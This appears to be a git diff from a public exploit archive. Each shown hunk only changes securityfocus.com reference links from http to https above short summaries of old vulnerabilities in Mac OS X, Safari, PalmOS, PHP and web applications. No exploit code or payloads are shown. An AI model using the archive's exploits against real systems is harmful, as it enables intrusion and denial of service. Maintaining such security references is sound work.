ddafcbc32..502c33075 100644 --- a/exploits/osx/remote/20984.txt +++ b/exploits/osx/remote/20984.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2953/info +source: https://www.securityfocus.com/bid/2953/info A vulnerability exists in all versions of Apple MacOS X. diff --git a/exploits/osx/remote/21238.txt b/exploits/osx/remote/21238.txt index ccf181585..9f10ff41e 100644 --- a/exploits/osx/remote/21238.txt +++ b/exploits/osx/remote/21238.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3935/info +source: https://www.securityfocus.com/bid/3935/info A vulnerability has been discovered in MacOS systems running Internet Explorer 5.1 and earlier. MacOS X is not affected by this issue. diff --git a/exploits/osx/remote/21596.txt b/exploits/osx/remote/21596.txt index 2f723fbce..cb2a26ae8 100644 --- a/exploits/osx/remote/21596.txt +++ b/exploits/osx/remote/21596.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5176/info +source: https://www.securityfocus.com/bid/5176/info A vulnerability has been reported for MacOS X where an attacker may use SoftwareUpdate to install malicious software on the vulnerable system. SoftwareUpdate uses HTTP, without any authentication, to obtain updates from Apple. Any updated packages are installed on the system as the root user. diff --git a/exploits/osx/remote/22630.txt b/exploits/osx/remote/22630.txt index b671f85ad..a5eeb8aeb 100644 --- a/exploits/osx/remote/22630.txt +++ b/exploits/osx/remote/22630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7660/info +source: https://www.securityfocus.com/bid/7660/info MP3Broadcaster is shipped as part of Darwin Streaming Server software. diff --git a/exploits/osx/remote/23800.txt b/exploits/osx/remote/23800.txt index a1ca2fb0a..7ba0d029b 100644 --- a/exploits/osx/remote/23800.txt +++ b/exploits/osx/remote/23800.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9841/info +source: https://www.securityfocus.com/bid/9841/info Multiple vendor Internet Browsers have been reported to be prone to a cookie path argument restriction bypass vulnerability. The issue presents itself due to a failure to properly sanitize encoded URI content, this may make it possible for an attacker to craft a URI that will contain encoded directory traversal sequences sufficient to provide access to a supposedly path exclusive cookie from an alternate path. diff --git a/exploits/osx/remote/24121.txt b/exploits/osx/remote/24121.txt index a9cece705..bdbb6d57f 100644 --- a/exploits/osx/remote/24121.txt +++ b/exploits/osx/remote/24121.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10356/info +source: https://www.securityfocus.com/bid/10356/info It has been reported that Mac OS X may be prone to a vulnerability that could allow a remote attacker to execute arbitrary script code on a vulnerable system. diff --git a/exploits/osx/remote/24716.txt b/exploits/osx/remote/24716.txt index d288b7baa..f08381e71 100644 --- a/exploits/osx/remote/24716.txt +++ b/exploits/osx/remote/24716.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11573/info +source: https://www.securityfocus.com/bid/11573/info A URI obfuscation weakness reportedly affects the Apple Safari Web Browser. diff --git a/exploits/osx/remote/25598.txt b/exploits/osx/remote/25598.txt index e39fce0ab..33cdc2254 100644 --- a/exploits/osx/remote/25598.txt +++ b/exploits/osx/remote/25598.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13491/info +source: https://www.securityfocus.com/bid/13491/info Apple Mac OS X is prone to a directory-traversal vulnerability. Since the software fails to sufficiently sanitize input, a remote attacker could use the Bluetooth file- and object-exchange services to access files outside the default file-exchange directory. diff --git a/exploits/osx/remote/25626.c b/exploits/osx/remote/25626.c index dca340d1a..4d9c3aa96 100644 --- a/exploits/osx/remote/25626.c +++ b/exploits/osx/remote/25626.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13538/info +// source: https://www.securityfocus.com/bid/13538/info The Tomcat Plugin supplied with the HTTP server is reportedly prone to a remote buffer overflow vulnerability. diff --git a/exploits/osx/remote/26152.txt b/exploits/osx/remote/26152.txt index c28444887..70f41ca94 100644 --- a/exploits/osx/remote/26152.txt +++ b/exploits/osx/remote/26152.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14569/info +source: https://www.securityfocus.com/bid/14569/info Apple Mac OS X Weblog Server is prone to cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/osx/remote/28643.txt b/exploits/osx/remote/28643.txt index 512201dd9..5a79d34b9 100644 --- a/exploits/osx/remote/28643.txt +++ b/exploits/osx/remote/28643.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20144/info +source: https://www.securityfocus.com/bid/20144/info The Apple Mac OS X AirPort wireless driver is prone to multiple buffer-overflow vulnerabilities because it fails to perform sufficient bounds checking before copying data to finite-sized buffers. diff --git a/exploits/osx/remote/28710.txt b/exploits/osx/remote/28710.txt index 91e1c008b..ddc3ffd7a 100644 --- a/exploits/osx/remote/28710.txt +++ b/exploits/osx/remote/28710.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20218/info +source: https://www.securityfocus.com/bid/20218/info Skype is prone to a remote format-string vulnerability because the application fails to properly sanitize user-supplied input before using it in the format-specification argument of a formatted-printing function. diff --git a/exploits/osx/remote/29448.txt b/exploits/osx/remote/29448.txt index 78a486d42..a7f8322f5 100644 --- a/exploits/osx/remote/29448.txt +++ b/exploits/osx/remote/29448.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22022/info +source: https://www.securityfocus.com/bid/22022/info Apple Mac OS X is prone to a remote integer-overflow vulnerability. This issue occurs when the UFS filesystem handler fails to handle specially crafted DMG images. diff --git a/exploits/osx/remote/29614.xml b/exploits/osx/remote/29614.xml index d8fbae1e6..b94b008d2 100644 --- a/exploits/osx/remote/29614.xml +++ b/exploits/osx/remote/29614.xml @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22597/info +source: https://www.securityfocus.com/bid/22597/info Parallels is prone to an arbitrary code-execution vulnerability because of a design flaw in the affected application. diff --git a/exploits/osx/remote/30228.txt b/exploits/osx/remote/30228.txt index adf0b714c..c19ea96df 100644 --- a/exploits/osx/remote/30228.txt +++ b/exploits/osx/remote/30228.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24598/info +source: https://www.securityfocus.com/bid/24598/info Apple WebCore is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/osx/remote/30781.txt b/exploits/osx/remote/30781.txt index 4a5ca88af..d18efee68 100644 --- a/exploits/osx/remote/30781.txt +++ b/exploits/osx/remote/30781.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26510/info +source: https://www.securityfocus.com/bid/26510/info Apple Mac OS X is prone to a vulnerability that can allow arbitrary code to run. This issue affects the Mail application when handling email attachments. @@ -11,7 +11,7 @@ NOTE: This vulnerability may be related to CVE-2007-0395 documented in BID 16907 UPDATE (November 21, 2007): Reports indicate that this issue occurs because of an error in the application's quarantine feature. We have not confirmed this information. UPDATE (December 17, 2007): This vulnerability stems from an unspecified implementation issue in the Launch Services application. -http://www.securityfocus.com/bid/16907 +https://www.securityfocus.com/bid/16907 /bin/ls -al echo diff --git a/exploits/osx/remote/31412.txt b/exploits/osx/remote/31412.txt index a658aa6b0..cb7f0b647 100644 --- a/exploits/osx/remote/31412.txt +++ b/exploits/osx/remote/31412.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28278/info +source: https://www.securityfocus.com/bid/28278/info Apple Mac OS X Server Wiki Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/osx/remote/31473.html b/exploits/osx/remote/31473.html index 3d4ffe009..cfe060de2 100644 --- a/exploits/osx/remote/31473.html +++ b/exploits/osx/remote/31473.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28405/info +source: https://www.securityfocus.com/bid/28405/info Apple Safari is prone to a content-spoofing vulnerability that allows attackers to populate a vulnerable Safari browser window with arbitrary malicious content. During such an attack, the URL and window title will display the intended site, while the body of the webpage is spoofed. diff --git a/exploits/osx/remote/31613.ics b/exploits/osx/remote/31613.ics index 303f1fb31..01106216c 100644 --- a/exploits/osx/remote/31613.ics +++ b/exploits/osx/remote/31613.ics @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28629/info +source: https://www.securityfocus.com/bid/28629/info Apple iCal is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. diff --git a/exploits/osx/remote/32048.html b/exploits/osx/remote/32048.html index 75b1cb854..853f475a2 100644 --- a/exploits/osx/remote/32048.html +++ b/exploits/osx/remote/32048.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30186/info +source: https://www.securityfocus.com/bid/30186/info Apple iPhone and iPod touch are prone to multiple remote vulnerabilities: diff --git a/exploits/osx/remote/33810.html b/exploits/osx/remote/33810.html index c4fdef03e..d8b2f41e7 100644 --- a/exploits/osx/remote/33810.html +++ b/exploits/osx/remote/33810.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38992/info +source: https://www.securityfocus.com/bid/38992/info Apple Safari on iPhone and iPod touch is prone to a remote code-execution vulnerability. diff --git a/exploits/osx/remote/33811.html b/exploits/osx/remote/33811.html index bad8c1ae8..92112b3bd 100644 --- a/exploits/osx/remote/33811.html +++ b/exploits/osx/remote/33811.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38994/info +source: https://www.securityfocus.com/bid/38994/info Apple Safari running on iPhone and iPod touch is prone to a remote code-execution vulnerability. diff --git a/exploits/osx/remote/35433.pl b/exploits/osx/remote/35433.pl index e40865ea1..81d32c35a 100755 --- a/exploits/osx/remote/35433.pl +++ b/exploits/osx/remote/35433.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46799/info +source: https://www.securityfocus.com/bid/46799/info Apple QuickTime is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/palm_os/dos/22602.c b/exploits/palm_os/dos/22602.c index 5b8126ba8..25105813b 100644 --- a/exploits/palm_os/dos/22602.c +++ b/exploits/palm_os/dos/22602.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7597/info +// source: https://www.securityfocus.com/bid/7597/info A problem with PalmOS may result in a denial of service. diff --git a/exploits/palm_os/local/20241.txt b/exploits/palm_os/local/20241.txt index 4ba0b2b76..16e0ddfed 100644 --- a/exploits/palm_os/local/20241.txt +++ b/exploits/palm_os/local/20241.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1715/info +source: https://www.securityfocus.com/bid/1715/info Palm OS is shipped with a security feature which enables a user to set password protection on various applications.The HotSync process allows a user to connect to a machine on the network through their Palm device. This process involves the device to send the encoded password to the HotSync Manager or HotSync Network Server on the network. The purpose of this transmission is to verify the password protection is still enabled when applications are being accessed from the network. diff --git a/exploits/palm_os/local/20505.txt b/exploits/palm_os/local/20505.txt index 596186408..750e1f794 100644 --- a/exploits/palm_os/local/20505.txt +++ b/exploits/palm_os/local/20505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2105/info +source: https://www.securityfocus.com/bid/2105/info Summary: diff --git a/exploits/palm_os/local/20746.c b/exploits/palm_os/local/20746.c index 3a41936df..4199df299 100644 --- a/exploits/palm_os/local/20746.c +++ b/exploits/palm_os/local/20746.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2567/info +// source: https://www.securityfocus.com/bid/2567/info Strip is a password generation utility made freely available by Zetetic Enterprises. Strip is a PalmOS based application designed to generate and store important passwords. diff --git a/exploits/palm_os/webapps/28659.txt b/exploits/palm_os/webapps/28659.txt index de1778470..a552367a7 100644 --- a/exploits/palm_os/webapps/28659.txt +++ b/exploits/palm_os/webapps/28659.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20162/info +source: https://www.securityfocus.com/bid/20162/info Jamroom is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/perl/webapps/37117.txt b/exploits/perl/webapps/37117.txt index 9c1f812de..a569444ac 100644 --- a/exploits/perl/webapps/37117.txt +++ b/exploits/perl/webapps/37117.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53287/info +source: https://www.securityfocus.com/bid/53287/info Croogo CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/perl/webapps/37126.txt b/exploits/perl/webapps/37126.txt index d17359daf..20a439a76 100644 --- a/exploits/perl/webapps/37126.txt +++ b/exploits/perl/webapps/37126.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53306/info +source: https://www.securityfocus.com/bid/53306/info MySQLDumper is prone to multiple security vulnerabilities, including: diff --git a/exploits/php/dos/21428.txt b/exploits/php/dos/21428.txt index d4e8fbec4..c091c0528 100644 --- a/exploits/php/dos/21428.txt +++ b/exploits/php/dos/21428.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4635/info +source: https://www.securityfocus.com/bid/4635/info Messagerie is a web message board application maintained by La Basse. diff --git a/exploits/php/dos/22110.txt b/exploits/php/dos/22110.txt index 7b275a55b..19d13607e 100644 --- a/exploits/php/dos/22110.txt +++ b/exploits/php/dos/22110.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6465/info +source: https://www.securityfocus.com/bid/6465/info A denial of service vulnerability has been reported for the modules.php script used by PHP-Nuke. The vulnerability occurs because the modules.php script does not properly validate some URI parameters. diff --git a/exploits/php/dos/22419.php b/exploits/php/dos/22419.php index d8a8d2243..e96fee7f2 100644 --- a/exploits/php/dos/22419.php +++ b/exploits/php/dos/22419.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7187/info +source: https://www.securityfocus.com/bid/7187/info A vulnerability has been reported in PHP versions 4.3.1 and earlier. The problem occurs in the socket_iovec_alloc() and may allow an attacker to corrupt memory. Specifically, the affected function fails to carry out sanity checks on user-supplied argument values, making it prone to an integer overflow. diff --git a/exploits/php/dos/22425.php b/exploits/php/dos/22425.php index cc00a5cf5..c6a6a3af8 100644 --- a/exploits/php/dos/22425.php +++ b/exploits/php/dos/22425.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7197/info +source: https://www.securityfocus.com/bid/7197/info A vulnerability has been reported in PHP versions 4.3.1 and earlier. The problem occurs in the socket_recv() and may allow an attacker to corrupt memory. Specifically, the affected function fails to carry out sanity checks on user-supplied argument values, making it prone to an integer overflow. diff --git a/exploits/php/dos/22426.php b/exploits/php/dos/22426.php index 1b1507c2c..c157b7dee 100644 --- a/exploits/php/dos/22426.php +++ b/exploits/php/dos/22426.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7198/info +source: https://www.securityfocus.com/bid/7198/info A vulnerability has been reported in PHP versions 4.3.1 and earlier. The problem occurs in the socket_recvfrom() and may allow an attacker to corrupt memory. Specifically, the affected function fails to carry out sanity checks on user-supplied argument values, making it prone to an integer overflow. diff --git a/exploits/php/dos/22435.php b/exploits/php/dos/22435.php index e300c1fd0..45914ee3c 100644 --- a/exploits/php/dos/22435.php +++ b/exploits/php/dos/22435.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7210/info +source: https://www.securityfocus.com/bid/7210/info A buffer overflow has been reported in the PHP openlog() function. By passing an argument of excessive size to the function, it may be possible for an attacker to overwrite memory, resulting in a denial of service. It is also possible for an attacker to execute arbitrary code in the PHP interpreter. diff --git a/exploits/php/dos/22494.txt b/exploits/php/dos/22494.txt index d9fb79303..204d9c796 100644 --- a/exploits/php/dos/22494.txt +++ b/exploits/php/dos/22494.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7351/info +source: https://www.securityfocus.com/bid/7351/info It has been reported that an attacker may trigger a denial of service condition in osCommerce application. If malicious URI parameters are passed to several of the osCommerce PHP pages, the mySQL and web server hosting osCommerce reportedly becomes unstable, possibly resulting in a denial of service condition. diff --git a/exploits/php/dos/22660.txt b/exploits/php/dos/22660.txt index 938b88aa6..a65044498 100644 --- a/exploits/php/dos/22660.txt +++ b/exploits/php/dos/22660.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7702/info +source: https://www.securityfocus.com/bid/7702/info some submissions to the rating system. Because of this, a remote attacker may be able to submit a string that causes a denial of service to legitmate users. diff --git a/exploits/php/dos/23311.txt b/exploits/php/dos/23311.txt index bd4f67797..26592cb04 100644 --- a/exploits/php/dos/23311.txt +++ b/exploits/php/dos/23311.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8930/info +source: https://www.securityfocus.com/bid/8930/info It has been reported that E107 may be prone to a denial of service vulnerability. The issue has been reported to exist due to improper handling of user-supplied data in the form of HTML or script code to the 'Name:' field of Chatbox.php script. This issue may cause the software to behave in an unstable manner leading to a crash. diff --git a/exploits/php/dos/23460.pl b/exploits/php/dos/23460.pl index 566927b24..0df7b456e 100755 --- a/exploits/php/dos/23460.pl +++ b/exploits/php/dos/23460.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9271/info +source: https://www.securityfocus.com/bid/9271/info It has been reported that ProjectForum may be prone to a denial of service vulnerability that may allow an attacker to cause the server to crash by sending an excessively long string via the 'find' request to the server. diff --git a/exploits/php/dos/23750.txt b/exploits/php/dos/23750.txt index 80ed37714..7296dec7f 100644 --- a/exploits/php/dos/23750.txt +++ b/exploits/php/dos/23750.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9732/info +source: https://www.securityfocus.com/bid/9732/info It has been reported that Opt-X may be prone to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem reportedly exists because remote users may influence the 'systempath' variable in the header.php module. diff --git a/exploits/php/dos/24621.txt b/exploits/php/dos/24621.txt index b605a16f4..40a994655 100644 --- a/exploits/php/dos/24621.txt +++ b/exploits/php/dos/24621.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11232/info +source: https://www.securityfocus.com/bid/11232/info The Pinnacle Systems ShowCenter web-based interface is reported prone to a remote denial of service vulnerability. diff --git a/exploits/php/dos/24854.txt b/exploits/php/dos/24854.txt index 91974a425..b87fb55f2 100644 --- a/exploits/php/dos/24854.txt +++ b/exploits/php/dos/24854.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11964/info +source: https://www.securityfocus.com/bid/11964/info PHP4 and PHP5 are reported prone to multiple local and remote vulnerabilities that may lead to code execution within the context of the vulnerable process. The following specific issues are reported: diff --git a/exploits/php/dos/24855.txt b/exploits/php/dos/24855.txt index a0adcdaa5..9676aadaf 100644 --- a/exploits/php/dos/24855.txt +++ b/exploits/php/dos/24855.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11964/info +source: https://www.securityfocus.com/bid/11964/info PHP4 and PHP5 are reported prone to multiple local and remote vulnerabilities that may lead to code execution within the context of the vulnerable process. The following specific issues are reported: diff --git a/exploits/php/dos/25752.txt b/exploits/php/dos/25752.txt index 211c5bc7d..5cfab6253 100644 --- a/exploits/php/dos/25752.txt +++ b/exploits/php/dos/25752.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13805/info +source: https://www.securityfocus.com/bid/13805/info PHPMailer is affected by a remote denial-of-service vulnerability. diff --git a/exploits/php/dos/29577.php b/exploits/php/dos/29577.php index eb3478c42..372e195f1 100644 --- a/exploits/php/dos/29577.php +++ b/exploits/php/dos/29577.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22505/info +source: https://www.securityfocus.com/bid/22505/info PHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/dos/29692.txt b/exploits/php/dos/29692.txt index f4a16b076..8cd067f12 100644 --- a/exploits/php/dos/29692.txt +++ b/exploits/php/dos/29692.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22764/info +source: https://www.securityfocus.com/bid/22764/info PHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/dos/29693.txt b/exploits/php/dos/29693.txt index afb47a7a6..5a967c31c 100644 --- a/exploits/php/dos/29693.txt +++ b/exploits/php/dos/29693.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22766/info +source: https://www.securityfocus.com/bid/22766/info PHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/dos/29823.c b/exploits/php/dos/29823.c index 2884a761c..38dbf34a0 100644 --- a/exploits/php/dos/29823.c +++ b/exploits/php/dos/29823.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23357/info +// source: https://www.securityfocus.com/bid/23357/info PHP's GD extension is prone to two integer-overflow vulnerabilities because it fails to ensure that integer values aren't overrun. diff --git a/exploits/php/dos/30401.php b/exploits/php/dos/30401.php index 739bb1120..e21a2b5d4 100644 --- a/exploits/php/dos/30401.php +++ b/exploits/php/dos/30401.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25079/info +source: https://www.securityfocus.com/bid/25079/info T1lib is prone to a buffer-overflow vulnerability because the library fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers. diff --git a/exploits/php/dos/30753.txt b/exploits/php/dos/30753.txt index 99dd80740..4d6d83c06 100644 --- a/exploits/php/dos/30753.txt +++ b/exploits/php/dos/30753.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26410/info +source: https://www.securityfocus.com/bid/26410/info AutoIndex PHP Script is prone to a remote denial-of-service vulnerability because the application fails to properly handle unexpected input. diff --git a/exploits/php/dos/30760.txt b/exploits/php/dos/30760.txt index 3d3600bbc..3e29d0c0d 100644 --- a/exploits/php/dos/30760.txt +++ b/exploits/php/dos/30760.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26428/info +source: https://www.securityfocus.com/bid/26428/info PHP is prone to multiple denial-of-service vulnerabilities because it fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/php/dos/32715.php b/exploits/php/dos/32715.php index c2b90fc6b..9325dffad 100644 --- a/exploits/php/dos/32715.php +++ b/exploits/php/dos/32715.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33216/info +source: https://www.securityfocus.com/bid/33216/info PHP is prone to a buffer-overflow vulnerability because it fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers. diff --git a/exploits/php/dos/32769.php b/exploits/php/dos/32769.php index 3abb776bb..26a5fba2d 100644 --- a/exploits/php/dos/32769.php +++ b/exploits/php/dos/32769.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33542/info +source: https://www.securityfocus.com/bid/33542/info PHP is prone to a denial-of-service vulnerability because it fails to limit global scope for certain settings relating to Unicode text operations. diff --git a/exploits/php/dos/33625.php b/exploits/php/dos/33625.php index 9bcae26bf..63b5ca620 100644 --- a/exploits/php/dos/33625.php +++ b/exploits/php/dos/33625.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38182/info +source: https://www.securityfocus.com/bid/38182/info PHP is prone to a 'safe_mode' restriction-bypass vulnerability. Successful exploits could allow an attacker to write session files in arbitrary directions. diff --git a/exploits/php/dos/33677.txt b/exploits/php/dos/33677.txt index e43b030cd..76f472146 100644 --- a/exploits/php/dos/33677.txt +++ b/exploits/php/dos/33677.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38430/info +source: https://www.securityfocus.com/bid/38430/info PHP is prone to a security vulnerability that affects LCG (Linear Congruential) entropy. diff --git a/exploits/php/dos/33755.php b/exploits/php/dos/33755.php index 54de0f55e..47cd9353a 100644 --- a/exploits/php/dos/33755.php +++ b/exploits/php/dos/33755.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38708/info +source: https://www.securityfocus.com/bid/38708/info PHP's xmlrpc extension library is prone to multiple denial-of-service vulnerabilities because it fails to properly handle crafted XML-RPC requests. diff --git a/exploits/php/dos/34505.txt b/exploits/php/dos/34505.txt index bb8f5ebc2..9af28356d 100644 --- a/exploits/php/dos/34505.txt +++ b/exploits/php/dos/34505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42598/info +source: https://www.securityfocus.com/bid/42598/info MySQL is prone to a denial-of-service vulnerability. diff --git a/exploits/php/dos/35164.php b/exploits/php/dos/35164.php index 3ae95b838..4305ff46a 100644 --- a/exploits/php/dos/35164.php +++ b/exploits/php/dos/35164.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45668/info +source: https://www.securityfocus.com/bid/45668/info PHP is prone to a remote denial-of-service vulnerability. diff --git a/exploits/php/dos/35354.txt b/exploits/php/dos/35354.txt index cf2f03be2..4bb244410 100644 --- a/exploits/php/dos/35354.txt +++ b/exploits/php/dos/35354.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46429/info +source: https://www.securityfocus.com/bid/46429/info PHP is prone to a denial-of-service vulnerability caused by a NULL-pointer dereference. diff --git a/exploits/php/dos/35483.txt b/exploits/php/dos/35483.txt index 0ca277417..e2978eaf5 100644 --- a/exploits/php/dos/35483.txt +++ b/exploits/php/dos/35483.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46968/info +source: https://www.securityfocus.com/bid/46968/info PHP is prone to a remote denial-of-service vulnerability that affects the 'Intl' extension. diff --git a/exploits/php/dos/35484.php b/exploits/php/dos/35484.php index de02232cc..0624af2e5 100644 --- a/exploits/php/dos/35484.php +++ b/exploits/php/dos/35484.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46969/info +source: https://www.securityfocus.com/bid/46969/info PHP is prone to a remote denial-of-service vulnerability that affects the 'Zip' extension. diff --git a/exploits/php/dos/35485.php b/exploits/php/dos/35485.php index fd6d278f0..6ce742d1c 100644 --- a/exploits/php/dos/35485.php +++ b/exploits/php/dos/35485.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46975/info +source: https://www.securityfocus.com/bid/46975/info PHP is prone to a remote denial-of-service vulnerability that affects the 'Zip' extension. diff --git a/exploits/php/dos/35486.php b/exploits/php/dos/35486.php index d76a50cc7..66d7049f2 100644 --- a/exploits/php/dos/35486.php +++ b/exploits/php/dos/35486.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46977/info +source: https://www.securityfocus.com/bid/46977/info PHP is prone to multiple remote denial-of-service vulnerabilities that affect the 'OpenSSL' extension. diff --git a/exploits/php/dos/35487.php b/exploits/php/dos/35487.php index bf769380d..f58b66856 100644 --- a/exploits/php/dos/35487.php +++ b/exploits/php/dos/35487.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46977/info +source: https://www.securityfocus.com/bid/46977/info PHP is prone to multiple remote denial-of-service vulnerabilities that affect the 'OpenSSL' extension. diff --git a/exploits/php/dos/36070.txt b/exploits/php/dos/36070.txt index d5f993862..e62a7fb89 100644 --- a/exploits/php/dos/36070.txt +++ b/exploits/php/dos/36070.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49249/info +source: https://www.securityfocus.com/bid/49249/info PHP is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference. diff --git a/exploits/php/dos/36682.php b/exploits/php/dos/36682.php index 7cfd84680..5d048e5d9 100644 --- a/exploits/php/dos/36682.php +++ b/exploits/php/dos/36682.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51952/info +source: https://www.securityfocus.com/bid/51952/info PHP is prone to a remote denial-of-service vulnerability. diff --git a/exploits/php/dos/36789.php b/exploits/php/dos/36789.php index a724988f5..44c87da58 100644 --- a/exploits/php/dos/36789.php +++ b/exploits/php/dos/36789.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52043/info +source: https://www.securityfocus.com/bid/52043/info PHP is prone to a remote denial-of-service vulnerability. diff --git a/exploits/php/dos/37566.php b/exploits/php/dos/37566.php index 78c004bb1..34ea89434 100644 --- a/exploits/php/dos/37566.php +++ b/exploits/php/dos/37566.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54777/info +source: https://www.securityfocus.com/bid/54777/info PHP is prone to a remote denial-of-service vulnerability. diff --git a/exploits/php/dos/39091.pl b/exploits/php/dos/39091.pl index fb6f1cf86..c3918106a 100755 --- a/exploits/php/dos/39091.pl +++ b/exploits/php/dos/39091.pl @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/65470/info +source: https://www.securityfocus.com/bid/65470/info WHMCS is prone to a denial-of-service vulnerability. diff --git a/exploits/php/dos/39092.pl b/exploits/php/dos/39092.pl index ba4779533..2cf8fb1b6 100755 --- a/exploits/php/dos/39092.pl +++ b/exploits/php/dos/39092.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65481/info +source: https://www.securityfocus.com/bid/65481/info phpBB is prone to a remote denial-of-service vulnerability. diff --git a/exploits/php/dos/39095.pl b/exploits/php/dos/39095.pl index 4d18b770b..03075736f 100755 --- a/exploits/php/dos/39095.pl +++ b/exploits/php/dos/39095.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65545/info +source: https://www.securityfocus.com/bid/65545/info MyBB is prone to a remote denial-of-service vulnerability. diff --git a/exploits/php/local/10296.txt b/exploits/php/local/10296.txt index c91ad8803..ccedd7fe9 100644 --- a/exploits/php/local/10296.txt +++ b/exploits/php/local/10296.txt @@ -20,7 +20,7 @@ Debian Linux 5.0 alpha Debian Linux 5.0 References: -http://www.securityfocus.com/bid/36009/info +https://www.securityfocus.com/bid/36009/info http://securityreason.com/achievement_securityalert/65 Description: diff --git a/exploits/php/local/20985.php b/exploits/php/local/20985.php index 6eac1c7e3..3e55bd748 100644 --- a/exploits/php/local/20985.php 